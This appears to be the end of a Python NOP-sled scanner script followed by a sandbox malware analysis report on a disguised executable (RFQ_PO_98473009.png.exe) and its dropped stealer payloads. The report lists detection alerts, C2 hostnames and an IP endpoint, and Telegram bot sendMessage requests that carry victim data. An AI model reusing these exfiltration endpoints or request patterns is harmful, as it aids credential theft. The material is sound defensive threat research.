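    """Run the scanner over the constructed buffer and return report-style rows."""
    return [h.describe() for h in find_nop_then_jmp(SAMPLE_CODE, SAMPLE_BASE)]


if __name__ == "__main__":
    for row in scan_sample():
        print(row)
```

To apply it to a real dump, read the JIT-compiled region (or an unpacked PE's code section) into `code` and pass its load address as `base`; the threshold of four matches the report's wording, and raising it drops the compiler's normal one- to three-byte alignment padding.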

                      Networking

                      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49753 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49759 -> 149.154.167.220:443
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2009/03/2025%20/%2008:58:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:27:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                      Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                      Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49713 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49726 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49714 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49719 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49721 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49720 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.64.1:443
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49715 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49716 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49729 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49730 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2009/03/2025%20/%2008:58:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:27:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:40:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:40:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                      Source: Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                      Source: Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                      Source: Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                      Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.00000000025CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                      Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.00000000026EA000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3627009294.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.00000000025CA000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.000000000267B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.0000000002549000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: Native_New-Nova.exe, 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: svchost.exe, 0000000B.00000002.2872650380.000001DE526A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000000B.00000003.1206385373.000001DE52818000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: edb.log.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 0000000B.00000003.1206385373.000001DE52818000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 0000000B.00000003.1206385373.000001DE52818000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 0000000B.00000003.1206385373.000001DE5284D000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: qmgr.db.11.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.0000000002718000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.00000000025EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1223205034.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3627009294.000000000267B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, lVbhkOPdhyxT.exe, 0000000D.00000002.1276643697.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.0000000002549000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: Native_snake01.exe, 00000013.00000002.3626598913.0000000002617000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000025AF000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002617000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: Native_New-Nova.exe, 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: Native_snake01.exe, 00000013.00000002.3626598913.0000000002617000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Native_snake01.exe, 00000013.00000002.3626598913.0000000002617000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a
Source: Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Native_snake01.exe, 0000000C.00000003.2723371653.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Native_snake01.exe, 0000000C.00000003.2723371653.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Native_snake01.exe, 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Native_snake01.exe, 0000000C.00000003.2723371653.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
